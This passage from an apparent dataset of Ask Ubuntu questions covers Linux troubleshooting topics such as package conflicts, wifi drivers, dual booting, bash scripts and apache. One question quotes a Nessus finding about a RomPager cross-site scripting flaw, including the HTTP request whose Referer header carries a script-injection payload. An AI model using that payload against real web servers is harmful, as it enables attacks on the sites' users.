5.0.2 ) broken liboxideqt-qmlplugin : i386 depends on libqt5gui5 [ i386 ] < 5.0.2+dfsg1-7ubuntu11.1 - > 5.2.1+dfsg-1ubuntu14.2 > ( libs ) ( > = 5.0.2 ) broken liboxideqt-qmlplugin : i386 depends on libqt5gui5-gles [ i386 ] < none > ( none ) ( > = 5.0.2 ) broken liboxideqt-qmlplugin : i386 depends on libqt5quick5 [ i386 ] < 5.0.2-6ubuntu4 - > 5.2.1-3ubuntu15.1 > ( libs ) ( > = 5.2.0~rc1 ) broken liboxideqt-qmlplugin : i386 depends on libqt5quick5-gles [ i386 ] < none > ( none ) ( > = 5.2.0~rc1 ) broken libunity-core-6.0-9 : i386 conflicts on libunity-core-6.0-8 [ i386 ] < 7.1.2+13.10.20131014.1-0ubuntu1 > ( libs ) broken libunity-core-6.0-9 : i386 conflicts on unity-common [ i386 ] < none | 6.12.0-0ubuntu0.2 > ( gnome ) broken libqt53d5 : i386 depends on libqt5gui5 [ i386 ] < 5.0.2+dfsg1-7ubuntu11.1 - > 5.2.1+dfsg-1ubuntu14.2 > ( libs ) ( > = 5.0.2 ) broken libqt53d5 : i386 depends on libqt5gui5-gles [ i386 ] < none > ( none ) ( > = 5.0.2 ) broken libqt53d5 : i386 depends on libqt5opengl5 [ i386 ] < 5.0.2+dfsg1-7ubuntu11.1 - > 5.2.1+dfsg-1ubuntu14.2 > ( libs ) ( > = 5.0.2 ) broken libqt53d5 : i386 depends on libqt5opengl5-gles [ i386 ] < none > ( none ) ( > = 5.0.2 ) broken libqt53d5 : i386 depends on libqt5quick5 [ i386 ] < 5.0.2-6ubuntu4 - > 5.2.1-3ubuntu15.1 > ( libs ) ( > = 5.2.0 ) broken libqt53d5 : i386 depends on libqt5quick5-gles [ i386 ] < none > ( none ) ( > = 5.2.0 ) broken libqt53d5 : i386 depends on libqt5widgets5 [ i386 ] < 5.0.2+dfsg1-7ubuntu11.1 - > 5.2.1+dfsg-1ubuntu14.2 > ( libs ) ( > = 5.0.2 ) broken qtdeclarative5-accounts-plugin : i386 depends on qtdeclarative5-qtquick2-plugin [ i386 ] < none - > 5.2.1-3ubuntu15.1 > ( libs ) broken unity-webapps-qml : i386 depends on libqt5webkit5-qmlwebkitplugin [ i386 ] < none - > 5.1.1-1ubuntu8 > ( libs ) broken checkbox-gui : i386 depends on qtdeclarative5-qtquick2-plugin [ i386 ] < none - > 5.2.1-3ubuntu15.1 > ( libs ) broken qtdeclarative5-dialogs-plugin : i386 depends on libqt5gui5 [ i386 ] < 5.0.2+dfsg1-7ubuntu11.1 - > 5.2.1+dfsg-1ubuntu14.2 > ( libs ) ( > = 5.2.0 ) broken qtdeclarative5-dialogs-plugin : i386 depends on libqt5gui5-gles [ i386 ] < none > ( none ) ( > = 5.2.0 ) broken qtdeclarative5-dialogs-plugin : i386 depends on libqt5quick5 [ i386 ] < 5.0.2-6ubuntu4 - > 5.2.1-3ubuntu15.1 > ( libs ) ( > = 5.2.0 ) broken qtdeclarative5-dialogs-plugin : i386 depends on libqt5quick5-gles [ i386 ] < none > ( none ) ( > = 5.2.0 ) broken qtdeclarative5-ubuntu-ui-extras-browser-plugin : i386 depends on libqt5gui5 [ i386 ] < 5.0.2+dfsg1-7ubuntu11.1 - > 5.2.1+dfsg-1ubuntu14.2 > ( libs ) ( > = 5.0.2 ) broken qtdeclarative5-ubuntu-ui-extras-browser-plugin : i386 depends on libqt5gui5-gles [ i386 ] < none > ( none ) ( > = 5.0.2 ) broken qtdeclarative5-ubuntu-ui-extras-browser-plugin : i386 depends on libqt5webkit5-qmlwebkitplugin [ i386 ] < none - > 5.1.1-1ubuntu8 > ( libs ) broken libqt5location5 : i386 depends on libqt53d5 [ i386 ] < 5.0~git20130731-0ubuntu1 - > 5.0~git20130731-0ubuntu5 > ( libs ) ( > = 5.0~git20130731 ) broken libqt5location5 : i386 depends on libqt53d5-gles [ i386 ] < none > ( none ) ( > = 5.0~git20130731 ) broken libqt5location5 : i386 depends on libqt5gui5 [ i386 ] < 5.0.2+dfsg1-7ubuntu11.1 - > 5.2.1+dfsg-1ubuntu14.2 > ( libs ) ( > = 5.0.2 ) broken libqt5location5 : i386 depends on libqt5gui5-gles [ i386 ] < none > ( none ) ( > = 5.0.2 ) broken libqt5location5 : i386 depends on libqt5opengl5 [ i386 ] < 5.0.2+dfsg1-7ubuntu11.1 - > 5.2.1+dfsg-1ubuntu14.2 > ( libs ) ( > = 5.0.2 ) broken libqt5location5 : i386 depends on libqt5opengl5-gles [ i386 ] < none > ( none ) ( > = 5.0.2 ) broken libqt5location5 : i386 depends on libqt5widgets5 [ i386 ] < 5.0.2+dfsg1-7ubuntu11.1 - > 5.2.1+dfsg-1ubuntu14.2 > ( libs ) ( > = 5.0.2 ) broken webbrowser-app : i386 depends on libqt5gui5 [ i386 ] < 5.0.2+dfsg1-7ubuntu11.1 - > 5.2.1+dfsg-1ubuntu14.2 > ( libs ) ( > = 5.0.2 ) broken webbrowser-app : i386 depends on libqt5gui5-gles [ i386 ] < none > ( none ) ( > = 5.0.2 ) broken webbrowser-app : i386 depends on libqt5quick5 [ i386 ] < 5.0.2-6ubuntu4 - > 5.2.1-3ubuntu15.1 > ( libs ) ( > = 5.2.0~rc1 ) broken webbrowser-app : i386 depends on libqt5quick5-gles [ i386 ] < none > ( none ) ( > = 5.2.0~rc1 ) broken webbrowser-app : i386 depends on libqt5widgets5 [ i386 ] < 5.0.2+dfsg1-7ubuntu11.1 - > 5.2.1+dfsg-1ubuntu14.2 > ( libs ) ( > = 5.0.2 ) broken qtdeclarative5-privatewidgets-plugin : i386 depends on libqt5gui5 [ i386 ] < 5.0.2+dfsg1-7ubuntu11.1 - > 5.2.1+dfsg-1ubuntu14.2 > ( libs ) ( > = 5.2.0 ) broken qtdeclarative5-privatewidgets-plugin : i386 depends on libqt5gui5-gles [ i386 ] < none > ( none ) ( > = 5.2.0 ) broken qtdeclarative5-privatewidgets-plugin : i386 depends on libqt5quick5 [ i386 ] < 5.0.2-6ubuntu4 - > 5.2.1-3ubuntu15.1 > ( libs ) ( > = 5.2.0 ) broken qtdeclarative5-privatewidgets-plugin : i386 depends on libqt5quick5-gles [ i386 ] < none > ( none ) ( > = 5.2.0 ) broken qtdeclarative5-privatewidgets-plugin : i386 depends on libqt5widgets5 [ i386 ] < 5.0.2+dfsg1-7ubuntu11.1 - > 5.2.1+dfsg-1ubuntu14.2 > ( libs ) ( > = 5.2.0 ) broken liboxideqtcore0 : i386 depends on libqt5gui5 [ i386 ] < 5.0.2+dfsg1-7ubuntu11.1 - > 5.2.1+dfsg-1ubuntu14.2 > ( libs ) ( > = 5.0.2 ) broken liboxideqtcore0 : i386 depends on libqt5gui5-gles [ i386 ] < none > ( none ) ( > = 5.0.2 ) broken appmenu-qt5 : i386 depends on libqt5gui5 [ i386 ] < 5.0.2+dfsg1-7ubuntu11.1 - > 5.2.1+dfsg-1ubuntu14.2 > ( libs ) ( > = 5.2.0 ) broken appmenu-qt5 : i386 depends on libqt5gui5-gles [ i386 ] < none > ( none ) ( > = 5.2.0 ) broken appmenu-qt5 : i386 depends on libqt5widgets5 [ i386 ] < 5.0.2+dfsg1-7ubuntu11.1 - > 5.2.1+dfsg-1ubuntu14.2 > ( libs ) ( > = 5.0.2 ) list of broken goes on and on ... .
517891	bash script for extracting archives - how to make the script ask for folder destination ?	i 've started using the bash script below , for unpacking archives . how would i go about making the script ask if i would like to specify a folder , or just use the default folder to extract to ? i 'd like to be able to run the archive script , and get a prompt saying : '' extract to default folder y , or n , instead specify folder ( enter folder ) . any help appreciated : ) excerpt from .bashrc extract ( ) { if [ -f $ 1 ] ; then case $ 1 in *.tar.bz2 ) tar xjf $ 1 ; ; *.tar.gz ) tar xzf $ 1 ; ; *.bz2 ) bunzip2 $ 1 ; ; *.rar ) unrar e $ 1 ; ; *.gz ) gunzip $ 1 ; ; *.tar ) tar xf $ 1 ; ; *.tbz2 ) tar xjf $ 1 ; ; *.tgz ) tar xzf $ 1 ; ; *.zip ) unzip $ 1 ; ; *.z ) uncompress $ 1 ; ; *.7z ) 7z x $ 1 ; ; * ) echo `` ' $ 1 ' can not be extracted via extract ( ) '' ; ; esac else echo `` ' $ 1 ' is not a valid file '' fi }
517892	wirelessly connecting a laptop running kali linux with a pc with ubuntu	i have a pc with ubuntu 14.04 installed and a laptop with kali linux 1.0.6 . i have a router and the pc is connected to the router via a ethernet cable and the laptop is connected to the network wirelessly . all i need is to share files between this pc and my laptop
517893	why do i get different outputs in case of sh and bash ?	i have the following simple script : # ! /bin/bash echo `` bash version $ { bash_version } ... '' for i in { 1..99..2 } do echo $ i done output in case i run with sh file.sh : bash version ... { 1..99..2 } output in case i run with bash file.sh : bash version 4.2.25 ( 1 ) -release ... 1 3 5 . . . 99 i have two queries : if i have written a shabang line specifying shell , should n't it run with bash whether i use sh file.sh or bash file.sh ? i understand that $ bash_version is not recognized by sh but what is the problem with for loop ? why is n't printing the numbers ?
517896	no partition showing for sd card	new to linux , installed lubuntu 14.04 on eee pc 900 . all works well except the sd card reader does show any partition when i run `` disks '' . when i select identity as /dev/sdc the capacity of the sd card is displayed but nothing else . if i select the usb2.0_cardreader or pci option on `` disks '' the system boot freezes until i remove the sd card . if i put the same sd card in a usb attachment , the device auto loads to the desktop , so there is nothing wrong with the card . i have followed the advice of many contributors without any success . i have installed gparted but got a system warning that i may cause damage through lack of knowledge . not sure what to do now , apart from just forgetting about the sd card slot.s
517900	ubuntu not finding my lvm2 volume	first let me say that i 'm pretty green when it comes to ubuntu ( and linux in general ) but using guides that i came across online i was able to setup a ubuntu 13.10 media/file server using a spare pc and drives that i purchased new . i joined my drives together in a lvm2 volume and things were great until the other night we had a power surge and now when booting the system i get these errors , sata5 : ultra dma mode-6 , s.m.a.r.t . capable but command failed sec master hard disk : s.m.a.r.t . command failed ( my two other drives come up as capable and status ok ) then when booting into ubuntu itself i get this error message , the disk drive for /media/ # # # # # # # # is not ready yet or not present . is there anything that i can do to try to retrieve the data that was on this volume to get it off those drives and backed up , or should i start looking for new disk drives and coming to grips with loosing all my media ?
517902	how do i disable suspend when my laptop is in the middle of shutting down ?	i 'm running 14.04 on a macbookpro8,1 . in general , suspend when i shut the lid works great ( save for a bug where the keyboard stops working sometimes on resume ) . the problem that i have is that when i shut the system down from the desktop . i hit 'shut down ' , and i see the purple ubuntu 'shutting down ' screen with the dots . if i close the lid before it 's completely shut down , it suspends . this means when i next open the lid , it resumes , and then promptly continues shutting down . i would have thought that suspend in the middle of shutting down is an undesired feature , and that initiating a shut down should disable all suspend / hibernate functionality . is this a quirk of this hardware , or a bug somewhere ? can i configure it not to do this without disabling suspend entirely ?
517904	nvidia-prime driver update	i 'm using a laptop with nvidia 710m optimus running on ubuntu 14.04 with nvidia-prime . a year ago , i had 12.04 with bumblebee and back then i had latest nvidia drives installed , now with nvidia-prime , it 's only using nvidia-331 . how do i update the drvier ? is it just as simple as downloading it and installing it or is there a repo to add ?
517906	ubuntu and ipods 2014	i have an ipod shuffle and i want to copy mp3 into it . how hard is it to do on ubuntu ? i tried amarok , rhytmbox , nothing works . any help ?
517907	create a beowulf cluster using ubuntu server or desktop ?	is there any way i can take the few computers i got from my work to make a beowulf cluster ? they 're all the exact same , and custom . i 'm an intern and they said i could go ahead and play with them , to do whatever . i 've read a few tutorials that are quite a bit old ( possibly outdated ? ) i 've got a switch , and i understand how ubuntu works . just a little confused as to how to set this up . i 'll be trying to calculate pi to 100,000 digits - echo `` scale=100000 ; 4*a ( 1 ) '' | bc -l ( if i can even get it to work ) but mostly , i want to put it together as a proof of concept . maybe i could use openstack ? again , i 'm smart , but quite a bit confused on this . i mean , i see quite a few different software options , but i 'm not sure which one i should pick , or if the ones i 'm looking at are even the right ones .
517910	installing can i install gstreamer 1.4 on ubuntu 14.04 ?	hello everyone i need to know is it possible to install gstreamer 1.4 framework on ubuntu 14.04 i searched google but really did n't found anything about it .
517915	apache2 could not get lock /var/cache/apt/archives/lock - open	mic @ mic-pc : ~ $ sudo apt-get install apache2 reading package lists ... done building dependency tree reading state information ... done apache2 is already the newest version . apache2 set to manually installed . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . e : could not get lock /var/cache/apt/archives/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/cache/apt/archives/ what is the problem .
517916	problem with ubuntu 14.04 update on 29th august 2014	i have an older style laptop , a fujitsu amilo li 1818 . it is set up for a dual boot to either run windows 7 professional or the latest version of ubuntu . it has been running perfectly up until recently . i ran update on the fujitsu on 29th august 2014 and thereafter i get a blank screen on trying to boot into ubuntu , whereas windows still boots perfectly . i have encountered this problem previously - see my previous post from a few months ago : - blank screen after update this week on two different computers previously to overcome the problem , i waited 6 weeks for the update team to remedy any glitches in the operating system , then did a fresh install of ubuntu . i believe that the current problem is the same type as before ie related to the driver for the old style graphics card - 'mobile intel 945 express graphics ' . i strongly suspect that one or more of the files in the ubuntu update of 29th august 2014 has perhaps altered a graphics driver file which is now incompatible and thus the computer has booted up into ubuntu but there is nothing visible on the blank screen . please can you communicate this problem to the update team as i am at present back to using microsoft windows as neither computer now runs ubuntu . if anyone has a 'fix ' to this problem , i would be most interested to hear it ! thanks . **
517920	black screen when entering password for system partition encryption ( nvidia )	i 'm with nvidia driver and system partition encryption set during installation . while i was with the default open source driver the password screen for the decryption was appearing fine . as soon as i switched to the latest nvidia driver from the app centre the screen where i enter this pass is all black and i have to enter the password in the dark and when it gets to the login screen is the first time when i have picture . i was lucky to actually find out it 's like that . so , any easy way to fix this ?
517921	accidently overwritten the ~/.bashrc file	while testing some commands i cleared the content of the ~/.bashrc file and i do n't have a backup from it is it enough to copy from /etc/skel/.bashrc to login normally the next time or i may face some problems
517925	how do i create a dhcp server , with a router that does n't allow me to disable dhcp ?	i have an actiontec v1000h modem/router from my isp telus , they have blocked access to all their 'advanced ' settings like dhcp/bridging . i have setup a maas server i have a few things i 'd like it to manage but the problem i 'm having is i ca n't netboot anything because i can not use maas-dhcp because my router does not allow me to disable it so my netboots can not find boot media . so my main question is as the title states , if i can not disable dhcp settings on my modem/router , how can i make it run in tandem with maas-dhcp so that i can netboot images . thanks . i 've read about setting next-server to point to my maas machine but i can not do that with my router .
517927	can not remove dropbox	i am using ubuntu 12.04 i tried to install dropbox using ubuntu software centre but it stopped at some point now i can not remove the partial installation . if i try using the software centre it hangs . at terminal sudo apt-get remove dropbox i get e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . what can i do ?
517929	checking whether a dvd film will play without skipping	i have a number of films/tv series on dvd that i want to sell on ebay . some of them have small marks or scratches , and i want to check that they will play without skipping . is there a way to check that the dvd will play the whole way through without error , other than watching the whole film/series . i have seen this question - checking scratched cd integrity but this is for cds , and i do n't think the suggested solution will work for dvds .
517930	need to match a string and then print next string matches and continue till next string	i am having troubles with manipulating a big text file , my sample f1.txt have several 3000 plus lines , with below format i need to match a string , and then match lines after that string with another string ( here in this case `` needed '' ) and print those matching lines along with original string . this should continue till all the strings are over . example requirement is below , can you help ? ======f1.txt==== string : a -- == == needed line -- -- -- -- -- -- 100 needed line -- -- -- -- -- -- -200 - string : b -- == == needed line -- -- -- -- -- -- 500 needed line -- -- -- -- -- -- -600 needed line -- -- -- -- -- -- 700 needed line -- -- -- -- -- -- -800 - string : c -- == needed line -- -- -- -- -- -- 900 === === output needed a needed line -- -- -- -- -- -- 100 a needed line -- -- -- -- -- -- -200 b needed line -- -- -- -- -- -- 500 b needed line -- -- -- -- -- -- -600 b needed line -- -- -- -- -- -- 700 b needed line -- -- -- -- -- -- -800 c needed line -- -- -- -- -- -- -900
517932	how can i install line ?	i would like to install line chat platform on my ubuntu 12.04 lts system . please , could anyone provide me the steps to successfully install this software ? . i 've been trying to install this software using wine but i could n't succeed it .
517935	problem while installing apache web server	i am facing problem while installing apache web server , i tried amulbhatia @ nadar : ~ $ sudo apt-get install apache2 [ sudo ] password for amulbhatia : sorry , try again . [ sudo ] password for amulbhatia : reading package lists ... done building dependency tree reading state information ... done **apache2 is already the newest version** . the following packages were automatically installed and are no longer required : kde-l10n-engb libqt4-webkit : i386 unity-scope-tool use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . amulbhatia @ nadar : ~ $ how to install , if already installed ? ? where it is installed ? ? and i want it to be integrated to aptana studio as external web server , so path will be required , what will be the path , thanks for your suggestions
517936	how to select wnic and bluetooth drivers	i 'm a completely new and yellow ubuntu user . i installed it yesterday on a old machine ( acer aspire 3610 ) . during instalation i had a problem - the process was hanging at `` bcmwl-kernel-source '' . i 've found info that not seleting `` download updates while installing '' and not selecting firmware to install can help . actually it did , but now wifi and bluetooth does n't work ... : / i suppose i have to install some drivers from this site http : //wireless.kernel.org/en/users/drivers but i have no idea how to check wchich one i need . maybe there is some other way also to solve my problem ... thank in advance !
517937	how to make windows 8 appear in a boot menu when dual-booting with ubuntu ?	i want to ask how to create gui for choosing os when booting my notebook . i have windows 8 preinstalled on my notebook , and i wish to have a dual boot system with ubuntu , however , after ubuntu finishes installing , i can not boot windows 8 . currently there is nothing to select to choices to boot windows 8 . thus , i wish to have a quick switch between two operating systems .
517939	hard disk failure after partition in ubuntu 13.4 using terminal	i did partition of my ubuntu system using sudo fdisk in terminal because i could not install windows 7 because it said something like there has to be some space to save some files on that space . so i partitioned my drive as there were no partitions before . after that , i restarted my computer and the computer does not work . it says no disk in the drive during boot and it does n't boot . then i tried to install ubuntu 12.10 which also did n't work . is the problem in my hard disk , is it damaged ? what should i do ? i have 3 lot of assignments due next week . i am so depressed . please help me .
517943	ubuntu wo n't run , windows wil	i tried to install ubuntu 14.04 on a lenovo pc running windows 8 . i burned the ubuntu installation file on an empty dvd and started the installation process . when it was done , i could choose whether i woukd use windows or ubuntu . clicking on the ubuntu icon , i 'm told there is something wrong with the program file . if i click on the windows icon , it runs like before . however , i only wish to run ubuntu on my laptop . can anyone tell me what went wrong and how to fix it ? thanks for answers !
517945	how to use usb bluetooth dongle/internal bluetooth chip on a virtual windows xp machine on ubuntu 14.04	i am able to use my internal bluetooth chip on ubuntu ( obvious ) . but i ca n't use it in a virtual machine ( windows xp ) installed with virtualbox . i also have a usb bluetooth dongle . but the problem is that my virtual machine does n't show any 'found new hardware ' or similar thing in it 's task bar . fyi i have installed guest additions too , but i am still unable to get any usb device working with the virtual machine . how can i use bluetooth in the virtual windows xp machine ( with internal chip/ usb dongle ) ?
517946	how to use a percentage character in the exec line of a desktop entry file	how can i use a percentage character in the exec line of a .desktop file ? the following example does not execute . [ desktop entry ] type=application terminal=false icon=vinagre name=rdp exec=/usr/bin/rdesktop -g 90 % x90 % somehostname
517948	anthy ubuntu 14.04 update	so i 've updated to 14.04 and anthy does work in that i can type japanese . thing is - everything i type goes into a little input box rather than straight into the field i 'm typing in . in firefox everything i type stays down in the lower lefthand corner of my screen until i hit enter . in write it 's in a little textbox superimposed above where i 'm typing . how can i fix this ? jim
517950	set brightness to 0 when lid closes	is there a way of setting the brightness level to 0 or blanking the screen when i close my lid ( without suspending the system ) . i just prefer it that way , since i listen to audiobooks while driving to work . i like to close the lid on my triple booted ( win 7 , mac os , ubuntu ) macbook air and i 'd like to conserve power while doing so . also , i do n't like my apple logo on the cover being lit if i just close the lid while i briefly do something . i could manually set the brightness of course , but is there a way of doing it automatically ? btw , i am using the unity desktop and ubuntu 14.04 .
517951	after removing the latest kernel , how can i be notified of kernel updates again ?	yesterday , i updated all packages through the software updater . it installed kernel 3.13.0-35 . when i rebooted , i would get a completely unresponsive blank screen , so i went back to the grub menu and i booted into the previous kernel : 3.13.0-34 . basically , 35 just would n't work and 34 would . then i uninstalled the latest kernel like so : sudo apt-get remove 3.13.0-35 now my question is two-fold : the software updater does not show me any kernel updates now . is this normal ? how can i be informed of kernel updates again ( through the software updater ) ? i feel that uninstalling 3.13.0-35 has somehow disabled kernel updates completely . output of sudo update-grub : generating grub configuration file ... found linux image : /boot/vmlinuz-3.13.0-34-generic found initrd image : /boot/initrd.img-3.13.0-34-generic found linux image : /boot/vmlinuz-3.13.0-33-generic found initrd image : /boot/initrd.img-3.13.0-33-generic found linux image : /boot/vmlinuz-3.13.0-32-generic found initrd image : /boot/initrd.img-3.13.0-32-generic found memtest86+ image : /boot/memtest86+.elf found memtest86+ image : /boot/memtest86+.bin found windows 8 ( loader ) on /dev/sda1 done
517952	14.04 update broke my graphic drivers	i updated from 13.10 to 14.04 .i had installed bumblebee and it was working fine until then . now i 'm getting the following error . [ 725.319677 ] [ error ] can not access secondary gpu - error : could not load gpu driver [ 725.319740 ] [ error ] aborting because fallback start is disabled . i followed this article to fix it but didnt work . http : //mylinuxexplore.blogspot.in/2014/03/solved-nvidia-cant-access-secondary-gpu.html
517953	how do i get `tr` command to ignore newline ?	i want to replace multiple spaces by a single space . i am using tr to do this . but it is also replacing new line with a space . how can i avoid it ? code : tr -s [ : space : ] ' ' input : he llo wor ld how are you required output : he llo wor ld how are you my output : he llo wor ld how are you
517954	highlight multiple cells according to list in libreoffice calc	i am new users of calc . i would like to highlight different cells that have different id . my aim is to copy the hole row of each of them . here is an example what i would like to do . id name age affiliate 1 x 23 dd 2 y 33 dd 3 g 46 ss 4 z 19 ty 5 w 80 ce and my list is id 6 2 3 5 7 after that i would like to reorder them according to the 1st table . i also tried to do it with r without success
517959	connect to vpn from tray	i 've just updated to 14.04 and i 'm trying to connect to my vpn . i can do it through the terminal fine enough but i ca n't connect by right clicking on the network manager icon in the tray . the dropdown and vpn are there but when i click on it nothing happens . how can i fix this ? thanks , jim
517960	enable hardware acceleration ( hw )	i have a hp-mini 110-1013tu netbook with ubuntu 14.04 ( gnome ) and elementary os installed . i have tried many ubuntu based linux distro ( linux mint 16 kde & 17 mate , lubuntu 14.04 , kubuntu 14.04 , ubuntu-unity 14.04 ) and fedora 20 . and when i install cairo-dock , only linux mint 16 kde support hw and the other does not support it . i 'm sorry because i forgot what driver installed in my mint 16 , currently i have mesa 1.4
517961	connected but no wifi	i have a c720 chromebook that 's been converted to ubunto 14.04 all been working fine except the wifi has suddenly stopped working . i 've tried stopping/restarting the laptop . i tried forgetting the wifi and then reconnecting but so far nothing has worked . it says it 's connected whenever i 'm in range but i just ca n't access the web . i was doing a daily software update a few days back and had to stop it ( it was taking too long to download ) . the wifi continued to work fine for the next few days though . i did turn the laptop off last night and that might have triggered something ? the laptop does n't have a wired network connection so this does make things a little more difficult to fix . i can access other pc 's on my local network by typing their local ip addresses into chrome . i can access the internet if i change the os back to chrome . can i roll back what ever changes were done in the update ? mike ( thanks for reading )
517962	pdf presenter console is installed but invisible in dash	i just installed pdf presenter console via the ubuntu software center . the centre confirms that the program is installed , but i can not see it in the installed applications in dash . so i can not open the program . apologies if this is a stupid question , but i am new to ubuntu . i am using ubuntu 14.04 lts 32bit , on an oldish hp compaq 6720s
517963	bash : permission denied when i move my cpp file to another location	i crafted a test cpp programme . it created a file in the home directory . it compiled with ease , and i could run it by typing ./rocketfire in the terminal . now , i did these : abhimanyu @ abhimanyupc : ~ $ sudo bash [ sudo ] password for abhimanyu : root @ abhimanyupc : ~ # cd /media/abhimanyu/abhimanyu/personal/code/programming root @ abhimanyupc : /media/abhimanyu/abhimanyu/personal/code/programming # ./rocketfire bash : ./rocketfire : permission denied i can not figure out what 's wrong . the drive is mounted . for a reference , i 've done all the necessary steps : creating a file via the terminal typing the code doing crtl+x doing g++ rocketfire.cpp -o rocketfire these all steps were successful .
517965	wifi not working on ubuntu and windows 8 dual boot	hey guys i recently dual booted windows 8 and ubuntu 14.04 lts on my laptop hp pavilion g6 . the dual boot works perfectly but wifi doesnt connect in ubuntu . it connects on windows 8 perfectly . i updated my driver through windows 8 but still the problem persists . any help on this would be greatly appreciated .
517966	solved ubuntu has mapped left ctrl key to my fn key on my hp laptop ubuntu 14.04	there seems to be a problem with my left ctrl key in ubuntu 14.04 . it is switched with my fn key , i.e . ubuntu thinks i 'm pressing the fn key , and when i actually press the fn key it thinks i 'm pressing the ctrl key . this is really frustrating and limiting my productivity ! how do i fix it ? ok i just found an answer to this yesterday . it turns out it 's not ubuntu that is the problem , something with the bios got messed up . so what fixed it is just unplugging the computer and taking the battery out for a couple of seconds : ) such a frustrating problem yet so easy to solve .
517967	rompager http server is affected by a cross-site scripting vulnerability	after auditing my ubuntu 14.04 machine with nessus scanner i received the following message : rompager http referer header xss description the remote rompager http server is affected by a cross-site scripting vulnerability . the server does not properly sanitize the referer header value when generating a 404 error page . solution upgrade to rompager 4.51 or later . nessus was able to verify the vulnerability exists with the following http request : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- snip -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- get /qn0vgjpbrmb3cnrt http/1.1 host : * accept-charset : iso-8859-1 , utf-8 ; q=0.9 , * ; q=0.1 accept-language : en connection : close referer : `` > alert ( `` xss '' ) user-agent : mozilla/4.0 ( compatible ; msie 8.0 ; windows nt 5.1 ; trident/4.0 ) pragma : no-cache accept : image/gif , image/x-xbitmap , image/jpeg , image/pjpeg , image/png , / -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- snip -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- port 80 tcp/www i can not find rompager on this machine nor much information about how to upgrade it . can anyone tell me what it does , how to find it and suggest how to go about upgrading it ? i did find this : http : //web.nvd.nist.gov/view/vuln/detail ? vulnid=cve-2013-6786 and it lists tp-link modems . i am using a tp-link modem but not that exact model . would a firmware update resolve this issue ?
517969	plymouthd crashed with sigsegv in ply_trigger_add_handler ( )	i use clean operation in recovery mode to make some free space.but after this operation i can not see unity desktop while login in as default user , but i am able to login as guest and root.i tried lots of techniques specified on different sites but non did work . when i logged in as root user it was showing the problem . plymouthd crashed with sigsegv in ply_trigger_add_handler ( ) i am using dell vostro 2420 system in dual boot . i do n't know how to fix this issue . kindly help me .
517972	internet connection failures	i have an hp mini 1035nr that i just installed unbuntu 14.04.1 on from 11.04 . my wifi would connect just fine before i did the upgrade , and now it wo n't let me connect using wifi or ethernet . i 've tried adding the b43 and b43legacy files into /lib/firmware/ myself using terminal . it says both folders are in there , but every time i boot my computer gives me an error saying the firmware files `` b43/ucode15.fw '' and `` b43-open/ucode15.fw '' are not found . now , i ca n't connect to the internet at all on it .
517974	qt creator - auto code generation	i have ubuntu-sdk ide and i am doing html5 programming in qt creator ide , it is working absolutely fine , but when i click on ctrl + space , auto code is not generating , please let me know what can i do to get auto code in qt creator for html5 , any plugin or anything is there ? ? ?
517975	add boot entry live persistent extracted ( to hard disk ) files to windows bootloader	i have live persistent extracted iso on my hard disk . i want to add a boot entry to windows boot loader ( currently working on win8 ) to directly boot that live persistent extracted iso . in other words , i want to use live ubuntu from my hard drive in windows computer . is it possible ? ? ? ? ( ps : please do n't suggest burn iso to usb . )
517977	how to connect to wireless with kubuntu 14.04 on my asus desktop ?	i 'm attempting to connect to my wireless connection over kubuntu . in konsole when i run nmcli nm i 'm getting this : running -- -- -state -- -- -- -- -- -- -- -- wifi-hardware -- -- -- -wifi -- -- -- -- -- wwan-hardware -- -- -- -- wwan running -- -- -disconnected -- -- -- -- -enabled -- -- -- -- -- -- -enabled -- -- -- -enabled -- -- -- -- -- -- -- disabled i 'm assuming this means that my wifi controller is properly installed and being recognized . i do n't know how to connect to wireless or configure the connection though ( i 'm a total newbie to kubuntu so i have absolutely no clue how to connect to the internet through kubuntu over wireless ) . any pointers would be appreciated . update : i tried sudo lshw -c network and this is what came up : *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 03 serial : 48:5b:39 : d3:3a:20 size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8168d-2.fw ip=10.0.0.9 latency=0 link=yes multicast=yes port=mii speed=1gbit/s resources : irq:41 ioport : e800 ( size=256 ) memory : f6fff000-f6ffffff memory : f6ff8000-f6ffbfff memory : fbdf0000-fbdfffff *-network description : network controller product : bcm4318 [ airforce one 54g ] 802.11g wireless lan controller vendor : broadcom corporation physical id : 1 bus info : pci @ 0000:04:01.0 version : 02 width : 32 bits clock : 33mhz capabilities : bus_master configuration : driver=b43-pci-bridge latency=64 resources : irq:16 memory : fbefe000-fbefffff so it seems to be seeing the network controller ( i 'm currently writing this by using my ethernet cable ) . it looks like it has a driver installed ( correct me if i 'm wrong ) . still ca n't enable wireless though . it 's currently disabled . when i looked up my network interfaces there are two . one is `` lo '' and one is `` eth0 '' which i assume is referring to my ethernet . output of rfkill list all command : ferociousmadman @ ferociousmadman-cm5675 : ~ $ rfkill list all ferociousmadman @ ferociousmadman-cm5675 : ~ $ update2 : chili555 seems to have answered my question , sudo modprobe b43 & & dmesg | grep b43 is what i had to type in , then i had to type in sudo apt-get install firmware-b43-installer so perhaps the right drivers were n't installed after all . in any case , i really appreciate the discussion and your assistance .
517978	ca n't ping arch linux machine from ubuntu server	i have a server and a desktop . server : os : ubuntu server 14.04.1 ip address : dhcp from asus router , allocated by mac address to 192.168.1.4 connection : wired ethernet , always on desktop : os : arch linux ip address : dhcp from asus router , allocated dynamically connection : wifi ( 802.11n ) i can ping the server from the desktop ( by hostname ) , but not the desktop from the server ( can ping in both directions by ip address , of course ) . both machines have winbind installed , both have wins added to /etc/nsswitch.conf , both have avahi-daemon installed and running . both use the asus router as their dns server . what else could be missing ?
